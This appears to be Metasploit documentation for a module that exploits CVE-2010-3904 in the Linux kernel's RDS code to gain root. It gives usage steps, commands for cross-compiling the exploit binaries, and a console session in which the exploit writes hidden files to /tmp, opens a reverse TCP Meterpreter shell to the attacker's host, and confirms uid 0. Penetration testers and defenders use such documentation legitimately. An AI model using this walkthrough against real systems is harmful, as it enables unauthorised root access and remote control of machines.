## Description

  This module exploits a vulnerability in the `rds_page_copy_user` function
  in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
  to execute code as `root` (CVE-2010-3904).


## Vulnerable Application

  This module has been tested successfully on:

  * Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE
  * Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: ```use exploit/linux/local/rds_rds_page_copy_user_priv_esc```
  4. Do: ```set SESSION [SESSION]```
  5. Do: ```check```
  6. Do: ```run```
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)

  **COMPILE**

  Options: `Auto` `True` `False` (default: `Auto`)

  Whether the exploit should be live compiled with `gcc` on the target system,
  or uploaded as a pre-compiled binary.

  `Auto` will first determine if `gcc` is installed to compile live on the system,
  and fall back to uploading a pre-compiled binary.


## Compiled Executables

The module makes use of two pre-compiled exploit executables (`rds.x86` and `rds.x64`),
to be use when `gcc` is not available on the target host for live compiling, or
`COMPILE` is set to `False`.

The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar.xz):

```bash
./x86_64-linux-musl-gcc -o rds.x64 -pie -static rds.c
./i486-linux-musl-gcc -o rds.x86 -pie -static rds.c
```


## Scenarios

  ```
  msf5 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
  [*] Writing '/tmp/.kBTWC7E' (237 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (853256 bytes) to 172.16.191.149
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.149:40103) at 2018-05-03 08:52:59 -0400
  [+] Deleted /tmp/.zEAOL.c
  [+] Deleted /tmp/.zEAOL
  [+] Deleted /tmp/.kBTWC7E

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.149
  OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 
  ```

## Re-exploitation

The exploit C code utilizes a defined send (`5555`) and receive (`6666`) port, which are opened while the payload is active.
Attempt to re-exploit while a successful exploit payload is open will result in the error:

```
[*] Could not bind socket.
```

However, killing that payload will allow for the exploit to run successfully.
